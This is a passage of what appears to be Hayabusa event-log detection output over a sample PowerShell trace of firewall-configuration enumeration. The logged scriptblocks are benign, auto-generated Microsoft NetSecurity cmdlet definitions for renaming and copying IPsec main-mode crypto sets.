[Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { 
try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('MaxMinutes') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxMinutes}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeMinutes', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MaxSessions') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxSessions}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeSessions', $__cmdletization_values, $false, 'Default') } if 
($PSBoundParameters.ContainsKey('ForceDiffieHellman') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForceDiffieHellman}) $__cmdletization_queryBuilder.FilterByProperty('ForceDiffieHellman', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 
'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml-Help.xml 
}",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.004 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Rename-NetIPsecMainModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxMinutes}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxSessions}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${ForceDiffieHellman}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, 
[Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] 
[Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not 
$__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('MaxMinutes') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxMinutes}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeMinutes', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MaxSessions') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxSessions}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeSessions', $__cmdletization_values, $false, 'Default') } if 
($PSBoundParameters.ContainsKey('ForceDiffieHellman') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForceDiffieHellman}) $__cmdletization_queryBuilder.FilterByProperty('ForceDiffieHellman', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 
'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; 
ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.004 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Copy-NetIPsecMainModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, 
[Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxMinutes}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxSessions}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${ForceDiffieHellman}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, 
[Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('MaxMinutes') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxMinutes}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeMinutes', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MaxSessions') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxSessions}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeSessions', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('ForceDiffieHellman') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForceDiffieHellman}) $__cmdletization_queryBuilder.FilterByProperty('ForceDiffieHellman', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', 